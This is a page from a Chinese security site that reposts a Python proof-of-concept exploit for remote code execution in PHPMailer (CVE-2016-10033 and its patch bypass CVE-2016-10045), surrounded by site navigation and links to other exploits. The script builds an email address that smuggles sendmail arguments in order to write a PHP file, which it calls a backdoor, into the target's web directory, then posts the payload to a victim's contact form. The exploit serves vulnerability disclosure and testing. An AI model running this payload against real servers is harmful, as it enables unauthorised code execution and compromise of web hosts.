首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPMailer < 5.2.20 - Remote Code Execution
来源:https://legalhackers.com 作者:Golunski 发布时间:2016-12-29  
#!/usr/bin/python
 
intro = """
PHPMailer RCE PoC Exploits
 
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
 
Discovered and Coded by:
 
 Dawid Golunski
 @dawid_golunski
 https://legalhackers.com
 
"""
usage = """
Usage:
 
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
 
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
 
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
 
Disclaimer:
For testing purposes only. Do no harm.
 
"""
 
import time
import urllib
import urllib2
import socket
import sys
 
RW_DIR = "/var/www/html/uploads"
 
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
 
# Choose/uncomment one of the payloads:
 
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR
 
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR
 
######################################
 
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
 
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
 
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android get_user/put_user Expl
·PHPMailer < 5.2.18 - Remote Co
·PHPMailer 5.2.17 - Remote Code
·SwiftMailer < 5.4.5-DEV - Remo
·FTPShell Server 6.36 - '.csv'
·PHPMailer < 5.2.18 - Remote Co
·XAMPP Control Panel - Denial O
·Zend Framework / zend-mail < 2
·Apache mod_session_crypto - Pa
·Xfinity Gateway (Technicolor D
·macOS 10.12.1 / iOS < 10.2 - s
·Internet Download Accelerator
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved